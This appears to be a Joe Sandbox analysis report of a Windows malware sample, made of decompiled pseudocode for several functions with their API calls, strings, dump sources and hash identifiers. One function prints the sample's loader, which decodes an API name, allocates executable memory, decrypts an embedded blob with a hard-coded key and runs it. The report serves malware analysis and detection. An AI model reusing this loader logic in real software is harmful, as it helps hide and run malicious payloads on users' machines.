								_t22 =  *((intOrPtr*)(E02302F84(0x4836b0ed, 0x27107c81, 0x189)))(); // executed
								asm("sbb esi, esi");
								_t78 = ( ~_t22 & 0xfd2a9217) + 0xe3d60f3;
								while(1) {
									L1:
									_t47 =  *0x230a4bc; // 0x5b4c50
									goto L2;
								}
							} else {
								if(_t78 == 0x23ab6912) {
									_push(_t76);
									_push( *((intOrPtr*)(_t47 + 0x20)));
									 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x3ffb132a, 0xaf)))();
									_t78 = 0x2dd1fc81;
									while(1) {
										L1:
										_t47 =  *0x230a4bc; // 0x5b4c50
										goto L2;
									}
								} else {
									if(_t78 != 0x2dd1fc81) {
										goto L29;
									} else {
										E02302FDF(_t47);
									}
								}
							}
						}
						goto L22;
						L29:
					} while (_t78 != 0x63522ad);
					goto L22;
				}
			}

0x02301df2
0x02301df4
0x02301df9
0x02301e00
0x02301e00
0x02301e00
0x02301e06
0x02301e06
0x02301e06
0x02301e06
0x02301e0c
0x00000000
0x00000000
0x02301e12
0x02301f38
0x02301f42
0x02301f43
0x02301f44
0x02301f49
0x02301f4c
0x02301f4e
0x02301f50
0x02301f60
0x02301f66
0x02301f6e
0x02301e00
0x02301e00
0x02301e00
0x00000000
0x02301e00
0x02301e18
0x02301e1e
0x02301efb
0x02301f04
0x02301f05
0x02301f06
0x02301f0b
0x02301f1b
0x02301f1f
0x02302054
0x02301f25
0x02301f25
0x02301e00
0x02301e00
0x02301e00
0x00000000
0x02301e00
0x02301e00
0x02301e24
0x02301e2a
0x02301ea6
0x02301eaf
0x02301eb0
0x02301eb1
0x02301eb5
0x02301eb9
0x02301ec9
0x02301ecb
0x02301edb
0x02301ee8
0x02301ef4
0x0230203b
0x0230203b
0x00000000
0x02301e2c
0x02301e32
0x02301e85
0x02301e9a
0x02301e9c
0x02301e00
0x02301e00
0x02301e00
0x00000000
0x02301e00
0x02301e34
0x02301e3a
0x02301e68
0x02301e6e
0x02301e70
0x02301e78
0x02301e7e
0x00000000
0x02301e7e
0x02301e3c
0x02301e42
0x00000000
0x02301e48
0x02301e48
0x02301e5d
0x02301e5f
0x02301e00
0x02301e00
0x02301e00
0x00000000
0x02301e00
0x02301e00
0x02301e42
0x02301e3a
0x02301e32
0x02301e2a
0x02301e1e
0x02301fa6
0x02301fae
0x02301fae
0x02301f7f
0x0230200a
0x0230200f
0x02302011
0x02302012
0x0230201a
0x02302026
0x0230202a
0x02302036
0x00000000
0x0230202c
0x0230202c
0x00000000
0x0230202c
0x02301f85
0x02301f8b
0x02301fd1
0x02301fda
0x02301fdc
0x02301fe1
0x02301ff1
0x02301ff7
0x02301fff
0x02301e00
0x02301e00
0x02301e00
0x00000000
0x02301e00
0x02301f8d
0x02301f93
0x02301faf
0x02301fb0
0x02301fc5
0x02301fc7
0x02301e00
0x02301e00
0x02301e00
0x00000000
0x02301e00
0x02301f95
0x02301f9b
0x00000000
0x02301fa1
0x02301fa1
0x02301fa1
0x02301f9b
0x02301f93
0x02301f8b
0x00000000
0x02302041
0x02302041
0x00000000
0x0230204d

APIs

CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?), ref: 02301F60

Strings

PL[, xrefs: 02301E00, 02301E70, 0230203B

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: CryptDecodeObject
String ID: PL[
API String ID: 1207547050-864583639
Opcode ID: 79bf8892b9833cd52c63e68b061405b8272adf4d473dbe3321ba98931d993c7c
Instruction ID: f57950964b088cf15bc68d1b901f35d88f63b395ca79b19fed01e2b1c704c6fb
Opcode Fuzzy Hash: 79bf8892b9833cd52c63e68b061405b8272adf4d473dbe3321ba98931d993c7c
Instruction Fuzzy Hash: A2519C73B4431567C93865284CE4E6B615F9BC8B55B29016EFC89AF2C0CB62CD42C7F2

Uniqueness

Uniqueness Score: -1.00%

Function 00404142, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00404142(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				int _t129;
				int _t130;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x443590; // 0x8ffedb05
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E0041F6EA(E00431C66, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E004038EB, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *(_t181 - 0x34) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *(_t181 - 0x30) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E0041FD26( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *(_t181 - 0x34) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *(_t181 - 0x30) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					_t129 = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164); // executed
					 *(_t181 - 0x34) = _t129;
					_t130 = ConvertDefaultLocale( *(_t181 - 0x1c)); // executed
					 *(_t181 - 0x30) = _t130;
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x400000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E0041F330(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x400000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E00403901(_t181 - 0x3c, 0x400000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E004039B1(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E004039E7(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E00403FD8(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E00403F0B(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]); // executed
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E0041E5DF(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 00404161
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
ConvertDefaultLocale.KERNEL32(?), ref: 00404209
ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248
GetVersion.KERNEL32 ref: 0040425D
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00404282
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004042A7
_sscanf.LIBCMT ref: 004042C7
ConvertDefaultLocale.KERNEL32(?), ref: 004042FC
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404302
RegCloseKey.ADVAPI32(?), ref: 00404311
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00404321
EnumResourceLanguagesA.KERNEL32 ref: 0040433C
ConvertDefaultLocale.KERNEL32(?), ref: 0040436D
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404373
_memset.LIBCMT ref: 0040438D

Strings

GetSystemDefaultUILanguage, xrefs: 004041D3
Control Panel\Desktop\ResourceLocale, xrefs: 00404275
kernel32.dll, xrefs: 00404174
GetUserDefaultUILanguage, xrefs: 0040418A
ntdll.dll, xrefs: 0040431C

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
Instruction ID: 73e1e2af98abfcea5160a2e7c85213876d0caf47e62fbe05c0c2028d5027c9cb
Opcode Fuzzy Hash: f08d9e5c1f063fad43e3bac39308fc273327a62577f739e3d1c5777cca01ddae
Instruction Fuzzy Hash: A1814CB1E002199BCB10DFA5DC45AFEBBB8EB98304F10052BF955F3280DB789A45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00401D20, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E00401D20(void* __eflags) {
				_Unknown_base(*)()* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				CHAR* _v100;
				void* _t37;

				_v92 = 0x43;
				_v88 = 0x72;
				_v84 = 0x79;
				_v80 = 0x70;
				_v76 = 0x74;
				_v72 = 0x41;
				_v68 = 0x63;
				_v64 = 0x71;
				_v60 = 0x75;
				_v56 = 0x69;
				_v52 = 0x72;
				_v48 = 0x65;
				_v44 = 0x43;
				_v40 = 0x6f;
				_v36 = 0x6e;
				_v32 = 0x74;
				_v28 = 0x65;
				_v24 = 0x78;
				_v20 = 0x74;
				_v16 = 0x41;
				_t21 =  &_v92; // 0x43
				_v100 = E00401CC0(__eflags, _t21, 0x14);
				_v8 = 0;
				_v8 = GetProcAddress(LoadLibraryW(L"ADVAPI32.DLL"), _v100);
				_v96 = 0;
				_push(0);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v96); // executed
				if(_v8() != 0) {
					_t37 = _v8( &_v96, 0, 0, 1, 8);
					__eflags = _t37;
					if(_t37 != 0) {
						return 1;
					}
					return 0;
				}
				return 0;
			}

APIs

Part of subcall function 00401CC0: _malloc.LIBCMT ref: 00401CCA

LoadLibraryW.KERNEL32(ADVAPI32.DLL,?), ref: 00401DD3
GetProcAddress.KERNEL32(00000000), ref: 00401DDA

Strings

CryptAcquireContextA, xrefs: 00401DB4, 00401DB7
t, xrefs: 00401DA4
C, xrefs: 00401D7A
n, xrefs: 00401D88
t, xrefs: 00401D8F
i, xrefs: 00401D65
q, xrefs: 00401D57
u, xrefs: 00401D5E
r, xrefs: 00401D6C
e, xrefs: 00401D73
ADVAPI32.DLL, xrefs: 00401DCE
x, xrefs: 00401D9D
A, xrefs: 00401DAB
e, xrefs: 00401D96
o, xrefs: 00401D81
A, xrefs: 00401D49
c, xrefs: 00401D50

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressLibraryLoadProc_malloc
String ID: A$A$ADVAPI32.DLL$C$CryptAcquireContextA$c$e$e$i$n$o$q$r$t$t$u$x
API String ID: 2391205483-810849556
Opcode ID: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
Instruction ID: 83cb7c6687cd2237a667902df97d767b3d8751ad43d865d9c8d3f020bb7d5c88
Opcode Fuzzy Hash: 33be6887776bb45f156c91100feadfee9feefed4932a3788c4d42c489fbfde11
Instruction Fuzzy Hash: A521B6B0D44308EAEB10CFD0D8497DEBBB5BB04748F104119E5087A2D0D7FE6A588F94

Uniqueness

Uniqueness Score: -1.00%

Function 00401E30, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 174
windowlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00401E30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				int _v24;
				char _v28;
				int _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				intOrPtr _v44;
				long _v48;
				struct HINSTANCE__* _v52;
				void* _v56;
				intOrPtr _v72;
				intOrPtr _v100;
				CHAR* _v104;
				long _v112;
				long _v116;
				intOrPtr _v120;
				void* __ebp;
				signed int _t74;
				void* _t97;
				signed int _t152;
				void* _t158;
				intOrPtr _t161;

				_t158 = __eflags;
				_push(0xffffffff);
				_push(E00431B18);
				_push( *[fs:0x0]);
				_t74 =  *0x443590; // 0x8ffedb05
				_push(_t74 ^ _t152);
				 *[fs:0x0] =  &_v16;
				_v120 = __ecx;
				E00406041(__ebx, _v120, __edi);
				_push(GetSystemMenu( *(_v120 + 0x20), 0));
				_v20 = E0040DEED(__ebx,  *(_v120 + 0x20), __edi, __esi, _t158);
				if(_v20 != 0) {
					E00402890( &_v28);
					_v8 = 0;
					_push(0x68);
					_v72 = E0040DDFE();
					if(_v72 != 0) {
						E00402910( &_v28, _v72, 0x68);
					}
					_v100 =  *((intOrPtr*)(_v28 - 0xc));
					_t161 = _v100;
					_t162 = _t161 == 0x00000000 & 0x000000ff;
					if((_t161 == 0x00000000 & 0x000000ff) == 0) {
						AppendMenuA( *(_v20 + 4), 0x800, 0, 0);
						_v104 = _v28;
						AppendMenuA( *(_v20 + 4), 0, 0x10, _v104);
					}
					_v32 = 0;
					_v56 = 0;
					_v48 = 0;
					_v40 = 0;
					_t97 = E00401D20(_t162); // executed
					_t163 = _t97;
					if(_t97 == 0) {
						_v40 = GetProcAddress(0x400000, "UUACZDADWAJJJJJ");
					}
					_v52 = E00401A10(L"kernel32.dll");
					_v36 = GetProcAddress(_v52, "VirtualAlloc");
					_v32 = E00401A70(_t163, 0x3d9, 0x11c1, 0x409,  &_v48);
					if(_v32 != 0) {
						_v56 = VirtualAlloc(0, _v48, 0x3000, 0x40);
					}
					if(_v56 != 0) {
						_v40(_v32, _v48, "6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q", 0x76, _v56);
					}
					_v24 = _v56;
					_v44 = _v24();
					_v8 = 0xffffffff;
					E00401320( &_v28);
				}
				_v112 =  *((intOrPtr*)(_v120 + 0x74));
				SendMessageA( *(_v120 + 0x20), 0x80, 1, _v112);
				_v116 =  *((intOrPtr*)(_v120 + 0x74));
				SendMessageA( *(_v120 + 0x20), 0x80, 0, _v116);
				if( *((intOrPtr*)(_v120 + 0x120)) == 0) {
					__eflags = _v120 + 0x78;
					E0040CA8B(_v120 + 0x78, 0);
				} else {
					E0040CA8B(_v120 + 0x78, 1);
				}
				if( *((intOrPtr*)(_v120 + 0x130)) == 0) {
					__eflags = _v120 + 0xcc;
					E0040CA8B(_v120 + 0xcc, 0);
				} else {
					E0040CA8B(_v120 + 0xcc, 1);
				}
				 *[fs:0x0] = _v16;
				return 1;
			}

APIs

GetSystemMenu.USER32(?,00000000,8FFEDB05), ref: 00401E69
AppendMenuA.USER32 ref: 00401EDA
AppendMenuA.USER32 ref: 00401EF5
GetProcAddress.KERNEL32(00400000,UUACZDADWAJJJJJ), ref: 00401F2A
GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 00401F4C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401F86
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00401FE1
SendMessageA.USER32(?,00000080,00000000,?), ref: 00402002

Strings

kernel32.dll, xrefs: 00401F33
6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q, xrefs: 00401F98
VirtualAlloc, xrefs: 00401F43
UUACZDADWAJJJJJ, xrefs: 00401F20

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Menu$AddressAppendMessageProcSend$AllocSystemVirtual
String ID: 6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q$UUACZDADWAJJJJJ$VirtualAlloc$kernel32.dll
API String ID: 788825803-1877897661
Opcode ID: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
Instruction ID: ff84c4e7adf23d41df9a6f65582e714f74d1400c784c60132990823294043f06
Opcode Fuzzy Hash: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
Instruction Fuzzy Hash: 3B711AB4E40208EBDB14DBA5C955BAEB7B5BF48704F20422EF5017B2D1D7796901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB2A, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E0041AB2A(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
				char _v124;
				char* _v128;
				char _v660;
				char _v804;
				char _v812;
				char _v820;
				intOrPtr _v832;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				char* _t53;
				char* _t57;
				void* _t59;
				intOrPtr _t73;
				void* _t76;
				char* _t79;
				char* _t81;
				char* _t84;
				void* _t87;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t100;
				signed int _t102;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;

				_t94 = __edx;
				_t90 = __ecx;
				_t102 =  &_v660;
				_t109 = _t108 - 0x310;
				_t44 =  *0x443590; // 0x8ffedb05
				_a652 = _t44 ^ _t102;
				_push(_t87);
				_push(_t95);
				_t99 = __ecx;
				_t96 = E0040DB94(_t87, _t95, __ecx, __eflags);
				 *(_t96 + 8) =  *(_t99 + 0x44);
				 *(_t96 + 0xc) =  *(_t99 + 0x44);
				if(GetModuleFileNameA( *(_t99 + 0x44),  &_a392, 0x104) == 0) {
					L7:
					E0040E0F0(_t90);
				} else {
					__eflags = __eax - 0x104;
					if(__eax == 0x104) {
						goto L7;
					}
				}
				_t53 = PathFindExtensionA( &_a392); // executed
				__eflags = _t53;
				_v128 = _t53;
				if(_t53 == 0) {
					E0040E0F0(_t90);
				}
				 *_v128 = 0;
				_t57 = E0041AAEC( &_a392,  &_a132, 0x104);
				__eflags = _t57;
				if(_t57 != 0) {
					E0040E0F0(_t90);
				}
				__eflags =  *(_t99 + 0x60);
				if( *(_t99 + 0x60) != 0) {
					L15:
					_t58 =  *(_t99 + 0x50);
					__eflags = _t58;
					if(_t58 != 0) {
						L20:
						 *(_t96 + 0x10) = _t58;
						__eflags =  *(_t99 + 0x64);
						if( *(_t99 + 0x64) != 0) {
							L26:
							__eflags =  *(_t99 + 0x68);
							if( *(_t99 + 0x68) != 0) {
								L28:
								_pop(_t97);
								_pop(_t100);
								_pop(_t89);
								_t59 = E0041E5DF(_t58, _t89, _a652 ^ _t102, _t94, _t97, _t100);
								__eflags =  &_a656;
								return _t59;
							} else {
								_push(E00421A5D(_t94,  &_a132, 0x104, ".INI"));
								E00402F17(0x104, _t90, _t96, _t99);
								_t58 = E0041FD45( &_a132);
								_t109 = _t109 + 0x14;
								__eflags = _t58;
								 *(_t99 + 0x68) = _t58;
								if(_t58 == 0) {
									goto L14;
								} else {
									goto L28;
								}
							}
						} else {
							_t76 =  &_a652 - _v128;
							__eflags =  *((intOrPtr*)(_t99 + 0x6c)) - 1;
							if( *((intOrPtr*)(_t99 + 0x6c)) != 1) {
								_push(".HLP");
							} else {
								_push(".CHM");
							}
							_push(_t76);
							_push(_v128);
							E00403EBB(0x104, _t94, _t96, _t99, _t102);
							_t109 = _t109 + 0xc;
							_t79 = E0041FD45( &_a392);
							__eflags = _t79;
							_pop(_t90);
							 *(_t99 + 0x64) = _t79;
							if(_t79 == 0) {
								goto L14;
							} else {
								_t58 = _v128;
								 *_v128 = 0;
								goto L26;
							}
						}
					} else {
						_t81 = E0040DDA7(0x104, _t90, _t96, _t99, _t102, 0xe000,  &_v124, 0x100);
						__eflags = _t81;
						if(_t81 == 0) {
							_push( *(_t99 + 0x60));
						} else {
							_push( &_v124);
						}
						_t58 = E0041FD45();
						__eflags = _t58;
						 *(_t99 + 0x50) = _t58;
						_pop(_t90);
						if(_t58 == 0) {
							goto L14;
						} else {
							goto L20;
						}
					}
				} else {
					_t84 = E0041FD45( &_a132);
					__eflags = _t84;
					_pop(_t90);
					 *(_t99 + 0x60) = _t84;
					if(_t84 != 0) {
						goto L15;
					} else {
						L14:
						_push(_t102);
						_t105 = _t109;
						_push(_t90);
						_v804 = 0x442350;
						E0041F7F4( &_v804, 0x43c4ec);
						asm("int3");
						_push(_t105);
						_t106 = _t109;
						_push(_t90);
						_t11 =  &_v812; // 0x442350
						_v812 = 0x4423e8;
						E0041F7F4(_t11, 0x43c54c);
						asm("int3");
						_push(_t106);
						_push(_t90);
						_t13 =  &_v820; // 0x4423e8
						_v820 = 0x442480;
						E0041F7F4(_t13, 0x43c590);
						asm("int3");
						_push(4);
						E0041F6EA(E00431BFC, 0x104, _t96, _t99);
						_t93 = E0040F014(0x104);
						_v832 = _t93;
						_t73 = 0;
						_v820 = 0;
						if(_t93 != 0) {
							_t73 = E0040D519(_t93);
						}
						return E0041F7C2(_t73);
					}
				}
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041AB6D
PathFindExtensionA.KERNELBASE(?), ref: 0041AB87
__strdup.LIBCMT ref: 0041ABC9
__strdup.LIBCMT ref: 0041AC02
__strdup.LIBCMT ref: 0041AC46
_strcat_s.LIBCMT ref: 0041AC6C
__strdup.LIBCMT ref: 0041AC7E

Strings

.INI, xrefs: 0041AC5F
.CHM, xrefs: 0041AC27
.HLP, xrefs: 0041AC2E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
String ID: .CHM$.HLP$.INI
API String ID: 1153805871-4017452060
Opcode ID: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
Instruction ID: 57232d50dc1b964aec71869080f5721069c83be35b5a1d3d80364e0175c1dcf5
Opcode Fuzzy Hash: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
Instruction Fuzzy Hash: 51416D715012499FDB30EFA9CD85BDB77ECBF04308F00482BE945D6641EB78E9948B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402750, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00402750(intOrPtr __ecx, CHAR* _a4) {
				void* _v8;
				int _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				long _t32;
				int _t34;
				char* _t36;
				char* _t46;
				char* _t48;

				_v32 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t46 =  *0x442000; // 0x4346d4
				_v16 = RegCreateKeyExA(0x80000002, _t46, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
				if(_v16 == 0) {
					_v28 = 0x104;
					_v20 = GetVersion();
